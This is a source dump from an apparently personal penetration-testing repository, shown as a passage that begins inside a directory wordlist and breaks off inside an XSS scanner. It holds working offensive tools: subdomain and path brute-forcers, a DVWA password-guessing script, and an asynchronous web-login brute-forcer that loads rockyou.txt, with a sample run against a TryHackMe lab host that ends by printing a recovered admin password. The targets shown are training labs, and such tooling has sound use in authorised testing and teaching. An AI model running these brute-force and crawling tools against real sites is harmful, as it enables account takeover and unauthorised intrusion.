3771 | special 3772 | special_offers 3773 | specials 3774 | specified 3775 | specs 3776 | speedtest 3777 | spellchecker 3778 | sphider 3779 | spider 3780 | spiders 3781 | splash 3782 | sponsor 3783 | sponsors 3784 | spool 3785 | sport 3786 | sports 3787 | Sports 3788 | spotlight 3789 | spryassets 3790 | Spy 3791 | spyware 3792 | sq 3793 | sql 3794 | SQL 3795 | sqladmin 3796 | sql-admin 3797 | sqlmanager 3798 | sqlnet 3799 | sqlweb 3800 | squelettes 3801 | squelettes-dist 3802 | squirrel 3803 | squirrelmail 3804 | sr 3805 | src 3806 | srchad 3807 | srv 3808 | ss 3809 | ss_vms_admin_sm 3810 | ssfm 3811 | ssh 3812 | sshadmin 3813 | ssi 3814 | ssl 3815 | ssl_check 3816 | sslvpn 3817 | ssn 3818 | sso 3819 | ssp_director 3820 | st 3821 | stackdump 3822 | staff 3823 | staff_directory 3824 | staffs 3825 | stage 3826 | staging 3827 | stale 3828 | standalone 3829 | standard 3830 | standards 3831 | star 3832 | staradmin 3833 | start 3834 | starter 3835 | startpage 3836 | stat 3837 | state 3838 | statement 3839 | statements 3840 | states 3841 | static 3842 | staticpages 3843 | statistic 3844 | statistics 3845 | Statistics 3846 | statistik 3847 | stats 3848 | Stats 3849 | statshistory 3850 | status 3851 | statusicon 3852 | stock 3853 | stoneedge 3854 | stop 3855 | storage 3856 | store 3857 | store_closed 3858 | stored 3859 | stores 3860 | stories 3861 | story 3862 | stow 3863 | strategy 3864 | stream 3865 | string 3866 | strut 3867 | struts 3868 | student 3869 | students 3870 | studio 3871 | stuff 3872 | style 3873 | style_avatars 3874 | style_captcha 3875 | style_css 3876 | style_emoticons 3877 | style_images 3878 | styles 3879 | stylesheet 3880 | stylesheets 3881 | sub 3882 | subdomains 3883 | subject 3884 | sub-login 3885 | submenus 3886 | submissions 3887 | submit 3888 | submitter 3889 | subs 3890 | subscribe 3891 | subscribed 3892 | subscriber 3893 | subscribers 3894 | subscription 3895 | subscriptions 3896 | success 3897 | suche 3898 | sucontact 3899 | suffix 3900 | suggest 3901 | suggest-listing 3902 | suite 3903 | suites 3904 | summary 3905 | sun 3906 | sunos 3907 | SUNWmc 3908 | super 3909 | Super-Admin 3910 | supplier 3911 | support 3912 | Support 3913 | support_login 3914 | supported 3915 | surf 3916 | survey 3917 | surveys 3918 | suspended.page 3919 | suupgrade 3920 | sv 3921 | svc 3922 | svn 3923 | svn-base 3924 | svr 3925 | sw 3926 | swajax1 3927 | swf 3928 | swfobject.js 3929 | swfs 3930 | switch 3931 | sws 3932 | synapse 3933 | sync 3934 | synced 3935 | syndication 3936 | sys 3937 | sysadmin 3938 | sys-admin 3939 | SysAdmin 3940 | sysadmin2 3941 | SysAdmin2 3942 | sysadmins 3943 | sysmanager 3944 | system 3945 | system_admin 3946 | system_administration 3947 | system_web 3948 | system-admin 3949 | system-administration 3950 | systems 3951 | sysuser 3952 | szukaj 3953 | t 3954 | T 3955 | t1 3956 | t3lib 3957 | table 3958 | tabs 3959 | tag 3960 | tagline 3961 | tags 3962 | tail 3963 | talk 3964 | talks 3965 | tape 3966 | tapes 3967 | tapestry 3968 | tar 3969 | tar.bz2 3970 | tar.gz 3971 | target 3972 | tartarus 3973 | task 3974 | tasks 3975 | taxonomy 3976 | tb 3977 | tcl 3978 | te 3979 | team 3980 | tech 3981 | technical 3982 | technology 3983 | Technology 3984 | tel 3985 | tele 3986 | television 3987 | tell_a_friend 3988 | tell_friend 3989 | tellafriend 3990 | temaoversikt 3991 | temp 3992 | TEMP 3993 | templ 3994 | template 3995 | templates 3996 | templates_c 3997 | templets 3998 | temporal 3999 | temporary 4000 | temps 4001 | term 4002 | terminal 4003 | terms 4004 | terms_privacy 4005 | termsofuse 4006 | terms-of-use 4007 | terrorism 4008 | test 4009 | test_db 4010 | test1 4011 | test123 4012 | test1234 4013 | test2 4014 | test3 4015 | test-cgi 4016 | teste 4017 | test-env 4018 | testimonial 4019 | testimonials 4020 | testing 4021 | tests 4022 | testsite 4023 | texis 4024 | text 4025 | text-base 4026 | textobject 4027 | textpattern 4028 | texts 4029 | tgp 4030 | tgz 4031 | th 4032 | thanks 4033 | thankyou 4034 | thank-you 4035 | the 4036 | theme 4037 | themes 4038 | Themes 4039 | thickbox 4040 | third-party 4041 | this 4042 | thread 4043 | threadrate 4044 | threads 4045 | threadtag 4046 | thumb 4047 | thumbnail 4048 | thumbnails 4049 | thumbs 4050 | thumbs.db 4051 | Thumbs.db 4052 | ticket 4053 | ticket_list 4054 | ticket_new 4055 | tickets 4056 | tienda 4057 | tiki 4058 | tiles 4059 | time 4060 | timeline 4061 | tiny_mce 4062 | tinymce 4063 | tip 4064 | tips 4065 | title 4066 | titles 4067 | tl 4068 | tls 4069 | tmp 4070 | TMP 4071 | tmpl 4072 | tmps 4073 | tn 4074 | tncms 4075 | to 4076 | toc 4077 | today 4078 | todel 4079 | todo 4080 | TODO 4081 | toggle 4082 | tomcat 4083 | tomcat-docs 4084 | tool 4085 | toolbar 4086 | toolkit 4087 | tools 4088 | tooltip 4089 | top 4090 | top1 4091 | topic 4092 | topicadmin 4093 | topics 4094 | toplist 4095 | toplists 4096 | topnav 4097 | topsites 4098 | torrent 4099 | torrents 4100 | tos 4101 | tour 4102 | tours 4103 | toys 4104 | tp 4105 | tpl 4106 | tpv 4107 | tr 4108 | trac 4109 | trace 4110 | traceroute 4111 | traces 4112 | track 4113 | trackback 4114 | trackclick 4115 | tracker 4116 | trackers 4117 | tracking 4118 | trackpackage 4119 | tracks 4120 | trade 4121 | trademarks 4122 | traffic 4123 | trailer 4124 | trailers 4125 | training 4126 | trans 4127 | transaction 4128 | transactions 4129 | transfer 4130 | transformations 4131 | translate 4132 | translations 4133 | transparent 4134 | transport 4135 | trap 4136 | trash 4137 | travel 4138 | Travel 4139 | treasury 4140 | tree 4141 | trees 4142 | trends 4143 | trial 4144 | true 4145 | trunk 4146 | tslib 4147 | tsweb 4148 | tt 4149 | tuning 4150 | turbine 4151 | tuscany 4152 | tutorial 4153 | tutorials 4154 | tv 4155 | tw 4156 | twatch 4157 | tweak 4158 | twiki 4159 | twitter 4160 | tx 4161 | txt 4162 | type 4163 | typo3 4164 | typo3_src 4165 | typo3conf 4166 | typo3temp 4167 | typolight 4168 | u 4169 | U 4170 | ua 4171 | ubb 4172 | uc 4173 | uc_client 4174 | uc_server 4175 | ucenter 4176 | ucp 4177 | uddi 4178 | uds 4179 | ui 4180 | uk 4181 | umbraco 4182 | umbraco_client 4183 | umts 4184 | uncategorized 4185 | under_update 4186 | uninstall 4187 | union 4188 | unix 4189 | unlock 4190 | unpaid 4191 | unreg 4192 | unregister 4193 | unsafe 4194 | unsubscribe 4195 | unused 4196 | up 4197 | upcoming 4198 | upd 4199 | update 4200 | updated 4201 | updateinstaller 4202 | updater 4203 | updates 4204 | updates-topic 4205 | upgrade 4206 | upgrade.readme 4207 | upload 4208 | upload_file 4209 | upload_files 4210 | uploaded 4211 | uploadedfiles 4212 | uploadedimages 4213 | uploader 4214 | uploadfile 4215 | uploadfiles 4216 | uploads 4217 | ur-admin 4218 | urchin 4219 | url 4220 | urlrewriter 4221 | urls 4222 | us 4223 | US 4224 | usa 4225 | usage 4226 | user 4227 | user_upload 4228 | useradmin 4229 | userapp 4230 | usercontrols 4231 | usercp 4232 | usercp2 4233 | userdir 4234 | userfiles 4235 | UserFiles 4236 | userimages 4237 | userinfo 4238 | userlist 4239 | userlog 4240 | userlogin 4241 | usermanager 4242 | username 4243 | usernames 4244 | usernote 4245 | users 4246 | usr 4247 | usrmgr 4248 | usrs 4249 | ustats 4250 | usuario 4251 | usuarios 4252 | util 4253 | utilities 4254 | Utilities 4255 | utility 4256 | utility_login 4257 | utils 4258 | v 4259 | V 4260 | v1 4261 | v2 4262 | v3 4263 | v4 4264 | vadmind 4265 | validation 4266 | validatior 4267 | vap 4268 | var 4269 | vault 4270 | vb 4271 | vbmodcp 4272 | vbs 4273 | vbscript 4274 | vbscripts 4275 | vbseo 4276 | vbseocp 4277 | vcss 4278 | vdsbackup 4279 | vector 4280 | vehicle 4281 | vehiclemakeoffer 4282 | vehiclequote 4283 | vehicletestdrive 4284 | velocity 4285 | venda 4286 | vendor 4287 | vendors 4288 | ver 4289 | ver1 4290 | ver2 4291 | version 4292 | verwaltung 4293 | vfs 4294 | vi 4295 | viagra 4296 | vid 4297 | video 4298 | Video 4299 | videos 4300 | view 4301 | view_cart 4302 | viewcart 4303 | viewcvs 4304 | viewer 4305 | viewfile 4306 | viewforum 4307 | viewlogin 4308 | viewonline 4309 | views 4310 | viewsource 4311 | view-source 4312 | viewsvn 4313 | viewthread 4314 | viewtopic 4315 | viewvc 4316 | vip 4317 | virtual 4318 | virus 4319 | visit 4320 | visitor 4321 | visitormessage 4322 | vista 4323 | vm 4324 | vmailadmin 4325 | void 4326 | voip 4327 | vol 4328 | volunteer 4329 | vote 4330 | voted 4331 | voter 4332 | votes 4333 | vp 4334 | vpg 4335 | vpn 4336 | vs 4337 | vsadmin 4338 | vuln 4339 | vvc_display 4340 | w 4341 | W 4342 | w3 4343 | w3c 4344 | w3svc 4345 | W3SVC 4346 | W3SVC1 4347 | W3SVC2 4348 | W3SVC3 4349 | wa 4350 | wallpaper 4351 | wallpapers 4352 | wap 4353 | war 4354 | warenkorb 4355 | warez 4356 | warn 4357 | way-board 4358 | wbboard 4359 | wbsadmin 4360 | wc 4361 | wcs 4362 | wdav 4363 | weather 4364 | web 4365 | web.config 4366 | web.xml 4367 | web_users 4368 | web1 4369 | web2 4370 | web3 4371 | webaccess 4372 | webadm 4373 | webadmin 4374 | WebAdmin 4375 | webagent 4376 | webalizer 4377 | webapp 4378 | webapps 4379 | webb 4380 | webbbs 4381 | web-beans 4382 | webboard 4383 | webcalendar 4384 | webcam 4385 | webcart 4386 | webcast 4387 | webcasts 4388 | webcgi 4389 | webcharts 4390 | webchat 4391 | web-console 4392 | webctrl_client 4393 | webdata 4394 | webdav 4395 | webdb 4396 | webdist 4397 | webedit 4398 | webfm_send 4399 | webhits 4400 | webim 4401 | webinar 4402 | web-inf 4403 | WEB-INF 4404 | weblog 4405 | weblogic 4406 | weblogs 4407 | webmail 4408 | webmaster 4409 | webmasters 4410 | webpages 4411 | webplus 4412 | webresource 4413 | websearch 4414 | webservice 4415 | webservices 4416 | webshop 4417 | website 4418 | websites 4419 | websphere 4420 | websql 4421 | webstat 4422 | webstats 4423 | websvn 4424 | webtrends 4425 | webusers 4426 | webvpn 4427 | webwork 4428 | wedding 4429 | week 4430 | weekly 4431 | welcome 4432 | well 4433 | wellcome 4434 | werbung 4435 | wget 4436 | what 4437 | whatever 4438 | whatnot 4439 | whatsnew 4440 | white 4441 | whitepaper 4442 | whitepapers 4443 | who 4444 | whois 4445 | wholesale 4446 | whosonline 4447 | why 4448 | wicket 4449 | wide_search 4450 | widget 4451 | widgets 4452 | wifi 4453 | wii 4454 | wiki 4455 | will 4456 | win 4457 | win32 4458 | windows 4459 | Windows 4460 | wink 4461 | winnt 4462 | wireless 4463 | wishlist 4464 | with 4465 | wiz 4466 | wizard 4467 | wizmysqladmin 4468 | wml 4469 | wolthuis 4470 | word 4471 | wordpress 4472 | work 4473 | workarea 4474 | workflowtasks 4475 | working 4476 | workplace 4477 | works 4478 | workshop 4479 | workshops 4480 | world 4481 | worldpayreturn 4482 | worldwide 4483 | wow 4484 | wp 4485 | wp-admin 4486 | wp-app 4487 | wp-atom 4488 | wpau-backup 4489 | wp-blog-header 4490 | wpcallback 4491 | wp-comments 4492 | wp-commentsrss2 4493 | wp-config 4494 | wpcontent 4495 | wp-content 4496 | wp-cron 4497 | wp-dbmanager 4498 | wp-feed 4499 | wp-icludes 4500 | wp-images 4501 | wp-includes 4502 | wp-links-opml 4503 | wp-load 4504 | wp-login 4505 | wp-mail 4506 | wp-pass 4507 | wp-rdf 4508 | wp-register 4509 | wp-rss 4510 | wp-rss2 4511 | wps 4512 | wp-settings 4513 | wp-signup 4514 | wp-syntax 4515 | wp-trackback 4516 | wrap 4517 | writing 4518 | ws 4519 | ws_ftp 4520 | WS_FTP 4521 | WS_FTP.LOG 4522 | ws-client 4523 | wsdl 4524 | wss 4525 | wstat 4526 | wstats 4527 | wt 4528 | wtai 4529 | wusage 4530 | wwhelp 4531 | www 4532 | www1 4533 | www2 4534 | www3 4535 | wwwboard 4536 | wwwjoin 4537 | wwwlog 4538 | wwwroot 4539 | www-sql 4540 | wwwstat 4541 | wwwstats 4542 | wwwthreads 4543 | wwwuser 4544 | wysiwyg 4545 | wysiwygpro 4546 | x 4547 | X 4548 | xajax 4549 | xajax_js 4550 | xalan 4551 | xbox 4552 | xcache 4553 | xcart 4554 | xd_receiver 4555 | xdb 4556 | xerces 4557 | xfer 4558 | xhtml 4559 | xlogin 4560 | xls 4561 | xmas 4562 | xml 4563 | XML 4564 | xmlfiles 4565 | xmlimporter 4566 | xmlrpc 4567 | xml-rpc 4568 | xmlrpc.php 4569 | xmlrpc_server 4570 | xmlrpc_server.php 4571 | xn 4572 | xsl 4573 | xslt 4574 | xsql 4575 | xx 4576 | xxx 4577 | XXX 4578 | xyz 4579 | xyzzy 4580 | y 4581 | yahoo 4582 | year 4583 | yearly 4584 | yesterday 4585 | yml 4586 | yonetici 4587 | yonetim 4588 | youtube 4589 | yshop 4590 | yt 4591 | yui 4592 | z 4593 | zap 4594 | zboard 4595 | zencart 4596 | zend 4597 | zero 4598 | zeus 4599 | zh 4600 | zh_CN 4601 | zh_TW 4602 | zh-cn 4603 | zh-tw 4604 | zimbra 4605 | zip 4606 | zipfiles 4607 | zips 4608 | zoeken 4609 | zone 4610 | zones 4611 | zoom 4612 | zope 4613 | zorum 4614 | zt 4615 | -------------------------------------------------------------------------------- /web-penetration/domain-crawler.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | 4 | def request(url): 5 | try: 6 | return requests.get("http://{}".format(url)) 7 | except requests.exceptions.ConnectionError: 8 | pass 9 | 10 | domain_list = "subdomains.txt" 11 | #"https://raw.githubusercontent.com/codeandrew/SecLists/master/Miscellaneous/subdomain-list.txt" 12 | target_url = raw_input("Enter Target URL: \n") 13 | 14 | discovered_subdomain_list = [] 15 | 16 | with open(domain_list, 'r') as wordlist_file: 17 | for line in wordlist_file: 18 | full_url = "{}.{}".format(line.strip(), target_url) 19 | response = request(full_url) 20 | if response: 21 | print("[+] Discovered subdomain --> {}".format(full_url)) 22 | discovered_subdomain_list.append(full_url) 23 | 24 | 25 | with open("{}-subdomains.txt".format(target_url), 'w') as f: 26 | for item in discovered_subdomain_list: 27 | print >> f, item 28 | -------------------------------------------------------------------------------- /web-penetration/extract_form.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests 4 | #from BeautifulSoup import BeautifulSoup 5 | from bs4 import BeautifulSoup 6 | import urlparse 7 | 8 | def request(url): 9 | try: 10 | return requests.get(url) 11 | except requests.exceptions.ConnectionError: 12 | pass 13 | 14 | target_url="http://10.0.2.15/mutillidae/index.php?page=dns-lookup.php" 15 | response = request(target_url) 16 | 17 | parsed_html = BeautifulSoup(response.content, features='lxml') 18 | form_list = parsed_html.findAll("form") 19 | 20 | for form in form_list: 21 | action = form.get('action') 22 | post_url = urlparse.urljoin(target_url, action) 23 | method = form.get('method') 24 | 25 | input_list = form.findAll('input') 26 | post_data = {} 27 | for input in input_list: 28 | input_name = input.get('name') 29 | input_type = input.get('type') 30 | input_value = input.get('value') 31 | if input_type == 'text': 32 | input_value = 'test' 33 | 34 | post_data[input_name] = input_value 35 | 36 | print(post_data) 37 | result = requests.post(post_url, data=post_data) 38 | print(result.content) -------------------------------------------------------------------------------- /web-penetration/path-crawler.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | 4 | def request(url): 5 | try: 6 | return requests.get("http://{}".format(url)) 7 | except requests.exceptions.ConnectionError: 8 | pass 9 | 10 | domain_list = "directories.txt" 11 | target_url = raw_input("Enter Target URL: \n") 12 | 13 | discovered_path_list = [] 14 | 15 | with open(domain_list, 'r') as wordlist_file: 16 | for line in wordlist_file: 17 | full_url = "{}/{}".format(target_url(), line.strip()) 18 | response = request(full_url) 19 | if response: 20 | print("[+] Discovered URL Path --> {}".format(full_url)) 21 | discovered_path_list.append(full_url) 22 | 23 | 24 | with open("{}-paths.txt".format(target_url), 'w') as f: 25 | for item in discovered_path_list: 26 | print >> f, item 27 | -------------------------------------------------------------------------------- /web-penetration/post.py: -------------------------------------------------------------------------------- 1 | #!/usr/env/python 2 | 3 | import requests 4 | # Note this post request is designed for metasploitable webste 5 | # dvwa 6 | 7 | target_url = 'http://10.0.2.15/dvwa/login.php' 8 | 9 | data_dict = { 10 | "username": "admin", 11 | "password": "", 12 | "Login" : "submit" 13 | } 14 | 15 | #response = requests.post(target_url, data_dict) 16 | #print(response.content) 17 | 18 | password_list="/root/Hvck/seclist/password.txt" 19 | error_list = ['failed', 'error'] 20 | 21 | with open(password_list, 'r') as wordlist_file: 22 | for line in wordlist_file: 23 | word = line.strip() 24 | data_dict['password'] = word 25 | response = requests.post(target_url, data=data_dict) 26 | if "Login failed" not in response.content: 27 | print('[+] Got Password ----> {}'.format(word)) 28 | exit() 29 | 30 | print("[+] Reached and of line") 31 | -------------------------------------------------------------------------------- /web-penetration/spider.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urlparse 4 | 5 | def extract_links_from(url): 6 | response = requests.get(url) 7 | return re.findall('(?:href=")(.*?)"', response.content) 8 | 9 | def crawl(url): 10 | href_links = extract_links_from(url) 11 | for link in href_links: 12 | parsed_link = urlparse.urljoin(url, link) 13 | 14 | if "#" in parsed_link: 15 | parsed_link = parsed_link.split('#')[0] 16 | 17 | if url in parsed_link and parsed_link not in target_links: 18 | target_links.append(parsed_link) 19 | print(parsed_link) 20 | crawl(parsed_link) 21 | 22 | 23 | url = raw_input("Enter Target URL: \n") 24 | protocol = raw_input("Is it using https? (y/n)") 25 | 26 | if protocol is 'y' : protocol = 'https://' 27 | if protocol is 'n' : protocol = 'http://' 28 | 29 | target_url = "{}{}".format(protocol, url) 30 | target_links = [] 31 | 32 | crawl(target_url) -------------------------------------------------------------------------------- /web-penetration/subdomains.txt: -------------------------------------------------------------------------------- 1 | mail 2 | www 3 | admin 4 | account 5 | dev 6 | news 7 | search 8 | api 9 | tools 10 | webmail 11 | blog 12 | mobile 13 | video 14 | media 15 | ads 16 | core 17 | backend 18 | staging 19 | -------------------------------------------------------------------------------- /web/bruteforce.py: -------------------------------------------------------------------------------- 1 | import aiohttp 2 | import asyncio 3 | import argparse 4 | import urllib.parse 5 | import json 6 | import os 7 | import re 8 | 9 | """ 10 | v1.2.1 11 | tested in 12 | - python 3.10.6 13 | - python 3.12.3 14 | 15 | pip3 install aiohttp 16 | """ 17 | 18 | 19 | async def post(session, index, FUZZ, filter, semaphore, url, headers, payload_template): 20 | payload = { 21 | key: value.replace("FUZZ", FUZZ) if "FUZZ" in value else value 22 | for key, value in payload_template.items() 23 | } 24 | 25 | # CHECK PAYLOADS 26 | if headers.get("Content-Type") == "application/x-www-form-urlencoded": 27 | data = payload 28 | if headers.get("Content-Type") == "application/json": 29 | data = json.dumps(payload) 30 | 31 | async with semaphore: 32 | try: 33 | async with session.post(url, data=data, headers=headers) as response: 34 | text = await response.text() 35 | if filter in text: 36 | response.status = 401 37 | status = "Failed" 38 | else: 39 | status = "CHECK THIS!" 40 | print() 41 | print("[!] POSSIBLE PASSWORD ") 42 | print(f"{index}: {FUZZ}") 43 | os._exit(1) 44 | 45 | LINE_CLEAR = "\x1b[2K" # <-- ANSI sequence 46 | print(index, response.status, status, FUZZ, end="\r", flush=True) 47 | print(end=LINE_CLEAR) 48 | return response.status 49 | except Exception as e: 50 | print(f"[-] Request failed: {e}") 51 | return None 52 | 53 | 54 | def read_file_to_array(file_path): 55 | expanded_path = os.path.expanduser(file_path) 56 | try: 57 | with open(expanded_path, "r", encoding="latin-1") as file: 58 | lines = file.readlines() 59 | return [line.strip() for line in lines] 60 | except Exception as e: 61 | print(f"Error reading file: {e}") 62 | return [] 63 | 64 | 65 | def parse_curl_command(file_path): 66 | with open(file_path, "r") as file: 67 | curl_command = file.read().strip() 68 | 69 | # Extract URL 70 | url_match = re.search(r"curl '([^']*)'", curl_command) 71 | url = url_match.group(1) if url_match else None 72 | 73 | # Extract headers 74 | headers = dict(re.findall(r"-H '([^:]*): ([^']*)'", curl_command)) 75 | 76 | # Extract data 77 | data_match = re.search(r"--data-raw '([^']*)'", curl_command) 78 | raw_data = data_match.group(1) if data_match else None 79 | decoded_data = urllib.parse.unquote_plus( 80 | raw_data 81 | ) # Decode URL-encoded form data, converting + to spaces correctly 82 | data = dict(re.findall(r"([^=&]+)=([^&]*)", decoded_data)) 83 | 84 | return url, headers, data 85 | 86 | 87 | async def main(url, headers, payload, filter_string): 88 | file_path = "~/wordlists/rockyou.txt" 89 | password_list = read_file_to_array(file_path) 90 | concurrent_limit = 50 91 | semaphore = asyncio.Semaphore(concurrent_limit) 92 | 93 | tasks = [] 94 | async with aiohttp.ClientSession() as session: 95 | for i in range(0, len(password_list), concurrent_limit): 96 | batch = password_list[i : i + concurrent_limit] 97 | 98 | for j, password in enumerate(batch): 99 | task = asyncio.ensure_future( 100 | post( 101 | session=session, 102 | index=i + j, 103 | FUZZ=password, 104 | filter=filter_string, 105 | semaphore=semaphore, 106 | url=url, 107 | headers=headers, 108 | payload_template=payload, 109 | ) 110 | ) 111 | tasks.append(task) 112 | 113 | responses = await asyncio.gather(*tasks) 114 | tasks = [] # Clear tasks for the next batch 115 | 116 | 117 | if __name__ == "__main__": 118 | parser = argparse.ArgumentParser(description="Parse curl command from a file") 119 | parser.add_argument( 120 | "--curl", type=str, help="File path of the curl command file", required=True 121 | ) 122 | parser.add_argument( 123 | "--filter_string", 124 | type=str, 125 | help="String/Phrase when login page is unsuccesful", 126 | required=True, 127 | ) 128 | args = parser.parse_args() 129 | 130 | url, headers, payload = parse_curl_command(args.curl) 131 | filter_string = args.filter_string 132 | """ 133 | to add filter by: 134 | - response size 135 | - response status code 136 | """ 137 | print("=" * 100) 138 | print("[+] WEB LOGIN BRUTEFORCE") 139 | print("\tauthor: @codeandrew") 140 | print("=" * 100) 141 | print("url:", url) 142 | print("headers:", json.dumps(headers, indent=4)) 143 | print("payload:", json.dumps(payload, indent=4)) 144 | print("filter_string:", json.dumps(filter_string, indent=4)) 145 | print("=" * 100) 146 | asyncio.run(main(url, headers, payload, filter_string)) 147 | 148 | """ 149 | targeting: https://tryhackme.com/r/room/hackpark 150 | try logging and copy the curl command 151 | 152 | ╰─$ time python3 web/bruteforce.py --curl web/curl.sh --filter_string "Login failed" 130 ↵ 153 | ==================================================================================================== 154 | [+] WEB LOGIN BRUTEFORCE 155 | author: @codeandrew 156 | ==================================================================================================== 157 | url: http://10.10.152.224/Account/login.aspx?ReturnURL=%2fadmin%2f 158 | headers: { 159 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8", 160 | "Accept-Language": "en-US,en", 161 | "Cache-Control": "max-age=0", 162 | "Connection": "keep-alive", 163 | "Content-Type": "application/x-www-form-urlencoded", 164 | "Origin": "http://10.10.152.224", 165 | "Referer": "http://10.10.152.224/Account/login.aspx?ReturnURL=/admin/", 166 | "Sec-GPC": "1", 167 | "Upgrade-Insecure-Requests": "1", 168 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 169 | } 170 | payload: { 171 | "__VIEWSTATE": "84FrBo5Xcnlbl1zdPW0PQCTThN1ZPowMBvjKMp1WauBf7ikEpFscl1zasCI5rmj+W2SUBqcmUVN7YcLe3+GG8mHsfBJ800HZdxjCHtwtNTRdXeDj3A6Zq0TAidKKsRwfFa201Bu6OyUugEKvtt5ecxUG3LX2AI7gUJwrXnb+tz+/gS84", 172 | "__EVENTVALIDATION": "InSzgul1R7mNXSeW+wt4uUIiNPC9zMCFo5U43mwk67eZIYuIZRTIYcOOr08wBmBKeD47JhZH1VpBI3K7kJbGbq3YwlXu4TKpgdbCGKO3wUlKcCkSPuSxZIlJ8jiozqFR8MyrTky/Jd3qFqVN15TeTaXsxfX29tsqBQIzrRQr4DWNc3ib", 173 | "ctl00$MainContent$LoginUser$UserName": "admin", 174 | "ctl00$MainContent$LoginUser$Password": "FUZZ", 175 | "ctl00$MainContent$LoginUser$LoginButton": "Log in" 176 | } 177 | filter_string: "Login failed" 178 | ==================================================================================================== 179 | 1445 401 Failed mamapapaeucho 180 | [!] CHECK THIS 181 | FUZZ: 1qaz2wsx 182 | python3 web/bruteforce.py --curl web/curl.sh --filter_string "Login failed" 1.52s user 0.32s system 7% cpu 23.149 total 183 | 184 | """ 185 | -------------------------------------------------------------------------------- /web/curl.sh: -------------------------------------------------------------------------------- 1 | curl 'http://10.10.152.224/Account/login.aspx?ReturnURL=%2fadmin%2f' \ 2 | -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8' \ 3 | -H 'Accept-Language: en-US,en' \ 4 | -H 'Cache-Control: max-age=0' \ 5 | -H 'Connection: keep-alive' \ 6 | -H 'Content-Type: application/x-www-form-urlencoded' \ 7 | -H 'Origin: http://10.10.152.224' \ 8 | -H 'Referer: http://10.10.152.224/Account/login.aspx?ReturnURL=/admin/' \ 9 | -H 'Sec-GPC: 1' \ 10 | -H 'Upgrade-Insecure-Requests: 1' \ 11 | -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \ 12 | --data-raw '__VIEWSTATE=NUKk2oXsa%2FAuNbCXaJFdRSC0Q4nWXYdnE0G9A3ZsXiHi2e4yR0Du7dtIeVcNELtIRoYnO4Xlvaqle3rxSA33tKDsUPlxmjNaOYfTZlWQrPm8GxcsUsYvD2SDbsquBGIreySBhXsQLkNaZROcw1Oop119pSJHXB25WhOS0gykVMFsIia0&__EVENTVALIDATION=lw53QeEKio%2BlKPnqSaKNt8u%2FJZgkr8l6dz8%2F%2FxvVW7%2BWQ3m79K%2Btude%2FhapZbccBOe5%2F0pdneh7rP3e9IvtPO60SquITbVwfPo72jxJkrSJnEqIeOqNKljqQ3QGEyFMsmp0Udb3SYUv7ckQRprh2VqfAUQnV1zhjl%2FmgTzEDl9ccpxWh&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=FUZZ&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in' \ 13 | --insecure 14 | -------------------------------------------------------------------------------- /xss-scanner/async-scanner.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import re 3 | import urllib.parse as urlparse 4 | from bs4 import BeautifulSoup 5 | import random 6 | import httpx 7 | 8 | USER_AGENTS = [ 9 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36", 10 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15; rv:70.0) Gecko/20100101 Firefox/70.0", 11 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36", 12 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0", 13 | ] 14 | 15 | class Scanner: 16 | def __init__(self, url, ignore_links) -> None: 17 | self.client = httpx.AsyncClient() 18 | self.set_user_agent() 19 | self.target_url = url 20 | self.target_links = [] 21 | self.ignore_links = ignore_links 22 | self.reports = { 23 | "target": "", 24 | "directory": {"crawl": [], "traversal": []}, 25 | "xss": [{"url": "", "form": "", "payload": ""}], 26 | } 27 | 28 | def set_user_agent(self): 29 | self.client.headers.update({"User-Agent": random.choice(USER_AGENTS)}) 30 | 31 | async def extract_links_from(self, url): 32 | response = await self.client.get(url) 33 | return re.findall('(?:href=")(.*?)"', response.text) 34 | 35 | async def crawl(self, url=None): 36 | if url is None: 37 | url = self.target_url 38 | 39 | href_links = await self.extract_links_from(url) 40 | for link in href_links: 41 | parsed_link = urlparse.urljoin(url, link) 42 | 43 | if "#" in parsed_link: 44 | parsed_link = parsed_link.split("#")[0] 45 | 46 | if ( 47 | self.target_url in parsed_link 48 | and parsed_link not in self.target_links 49 | and parsed_link not in self.ignore_links 50 | ): 51 | self.target_links.append(parsed_link) 52 | print(parsed_link) 53 | await self.crawl(parsed_link) 54 | 55 | async def extract_csrf_token(self, session, url): 56 | response = await session.get(url) 57 | soup = BeautifulSoup(response.content, "html.parser") 58 | token = soup.find("input", {"name": "user_token"})["value"] 59 | return token 60 | 61 | async def extract_forms(self, url): 62 | response = await self.client.get(url) 63 | parsed_html = BeautifulSoup(response.content, features="html.parser") 64 | return parsed_html.findAll("form") 65 | 66 | async def submit_form(self, form, value, url): 67 | action = form.get("action") 68 | method = form.get("method") 69 | post_url = urlparse.urljoin(url, action) 70 | 71 | input_list = form.findAll("input") 72 | post_data = {} 73 | for input in input_list: 74 | input_name = input.get("name") 75 | input_type = input.get("type") 76 | input_value = input.get("value") 77 | if input_type == "text": 78 | input_value = value 79 | 80 | post_data[input_name] = input_value 81 | if method == "post": 82 | return await self.client.post(post_url, data=post_data) 83 | return await self.client.get(post_url, params=post_data) 84 | 85 | async def run_scanner(self): 86 | tasks = [] 87 | for link in self.target_links: 88 | tasks.append(self.scan_link(link)) 89 | await asyncio.gather(*tasks) 90 | 91 | async def scan_link(self, link): 92 | forms = await self.extract_forms(link) 93 | 94 